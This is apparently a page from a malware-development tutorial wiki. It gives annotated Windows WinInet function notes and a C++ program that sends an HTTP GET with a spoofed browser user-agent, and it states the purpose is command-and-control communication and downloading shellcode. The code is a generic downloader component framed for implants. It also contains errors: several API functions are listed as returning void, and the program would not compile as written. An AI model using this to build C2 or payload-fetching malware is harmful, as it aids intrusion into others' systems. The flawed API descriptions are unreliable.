C++: Sendin HTTP GET Request

Objective

Sending HTTP request in order to communicate with C2 and/or dowloading additional malicious content like shellcode.

Non technical to do list

Send a get request with custom headers.
Get the result of http request as string.

Technical to do list

Initialize wininet.
Open http protocol for given address.
Create a http request handle.
Send request.
Push result bytes into a string variable.

Functions

InternetOpenW: Initilaze WinInet usage.
- Header: wininet.h
- Definition: void InternetOpenW(LPCWSTR lpszAgent,DWORD dwAccessType, LPCWSTR lpszProxy, LPCWSTR lpszProxyBypass,DWORD dwFlags);
  - lpszAgent: User-agent.
  - dwAccessType: Type of access. INTERNETOPEN_TYPE_DIRECT for resolving all hostnames locally. Check references for other options.
  - lpszProxy: Proxy address. Use null if no proxy needed. Check references for other options.
  - lpszProxyBypass: List of hostnames to not to use proxy. Use null if no proxy needed. Check references for other options.
  - dwFlags: 0 as default.
InternetConnectW: Opens http protocol for given site.
- Header: wininet.h
- Definition: void InternetConnectW(HINTERNET hInternet,LPCWSTR lpszServerName,INTERNET_PORT nServerPort,LPCWSTR lpszUserName,LPCWSTR lpszPassword,DWORD dwService,DWORD dwFlags,DWORD_PTR dwContext);
  - hInternet: Handle comes from InternetOpenW.
  - lpszServerName: Server hostname.
  - nServerPort: Port number.
  - lpszUserName: Username for ftp protocol. Null for HTTP.
  - lpszPassword: Password for ftp protocol. Null for HTTP.
  - dwService: Service name to use INTERNETSERVICE_HTTP for http.
  - dwFlags: 0 as default.
  - dwContext: 0 as default.
HttpOpenRequestW: Creates a HTTP request handle.
- Header: wininet.h
- Definition: void HttpOpenRequestW(HINTERNET hConnect,LPCWSTR lpszVerb,LPCWSTR lpszObjectName,LPCWSTR lpszVersion,LPCWSTR lpszReferrer,LPCWSTR *lplpszAcceptTypes,DWORD dwFlags,DWORD_PTR dwContext);
  - hConnect: Handle from InternetConnectW.
  - lpszVerb: Request type. L"GET".
  - lpszObjectName: Request path. L"/path".
  - lpszVersion: HTTP version. L"HTTP/1.1".
  - *lplpszAcceptTypes: Accept-types as array. For ex: text/*
  - dwFlags: 0 as default.
  - dwContext: 0 as default.
HttpSendRequestW: Sends HTTP request to destination.
- Header: wininet.h
- Definition: BOOLAPI HttpSendRequestW(HINTERNET hRequest,LPCWSTR lpszHeaders,DWORD dwHeadersLength,LPVOID lpOptional,DWORD dwOptionalLength);
  - hRequest: Handle comes from HttpOpenRequestW.
  - lpszHeaders: HTTP Headers to use. L"Host: abc.com".
  - dwHeaderLength: Length of headers. 0 can be used wihtout any problem.
  - lpOptional: NULL as default.
  - dwOptionalLength: 0 as default.

Application (http-request.cpp)

#include <windows.h>
#include <WinInet.h>
#include <iostream>
#include <string>

int main(){

LPWSTR headers=L"Host: "; //edit this value manually. For multiple headers use \n\r
const wchar_t* parrAcceptTypes[] = { L"text/*", NULL };
	
	//initialize wininet
    HINTERNET hInternet = InternetOpenW(L"Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
   
   //open http protocol
     HINTERNET hConnect = InternetConnectW(hInternet, L"url", 80, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
  
    
    //create http request handle
    HINTERNET hRequest = HttpOpenRequestW(hConnect, L"GET", L"path", L"HTTP/1.1", NULL, parrAcceptTypes, 0, 0);
    
    //send http request
    
    BOOL bRequestSent = HttpSendRequestW(hRequest, headers, 0, NULL, 0);
 	std::string strResponse;
    const int nBuffSize = 1024;
    char buff[nBuffSize];
 
          BOOL bKeepReading = true;
          DWORD dwBytesRead = -1;
 
 //get result as string
          while(bKeepReading && dwBytesRead!=0)
          {
            bKeepReading = InternetReadFile( hRequest, buff, nBuffSize, &dwBytesRead );
            strResponse.append(buff, dwBytesRead);
          }
 
        InternetCloseHandle(hRequest);
      InternetCloseHandle(hConnect);
    InternetCloseHandle(hInternet);
    
  //print the result
cout << strResponse;

return 0;

}

Compile: g++ http-request.cpp -o http-request.exe -l wininet

References

Stackoverflow

PreviousC++: Dynamic DLL Usage NextC++: Sandbox Detection via Registry

Last updated 3 years ago

Was this helpful?

#include <windows.h> #include <WinInet.h> #include <iostream> #include <string> int main(){ LPWSTR headers=L"Host: "; //edit this value manually. For multiple headers use \n\r const wchar_t* parrAcceptTypes[] = { L"text/*", NULL }; //initialize wininet HINTERNET hInternet = InternetOpenW(L"Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0); //open http protocol HINTERNET hConnect = InternetConnectW(hInternet, L"url", 80, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0); //create http request handle HINTERNET hRequest = HttpOpenRequestW(hConnect, L"GET", L"path", L"HTTP/1.1", NULL, parrAcceptTypes, 0, 0); //send http request BOOL bRequestSent = HttpSendRequestW(hRequest, headers, 0, NULL, 0); std::string strResponse; const int nBuffSize = 1024; char buff[nBuffSize]; BOOL bKeepReading = true; DWORD dwBytesRead = -1; //get result as string while(bKeepReading && dwBytesRead!=0) { bKeepReading = InternetReadFile( hRequest, buff, nBuffSize, &dwBytesRead ); strResponse.append(buff, dwBytesRead); } InternetCloseHandle(hRequest); InternetCloseHandle(hConnect); InternetCloseHandle(hInternet); //print the result cout << strResponse; return 0; }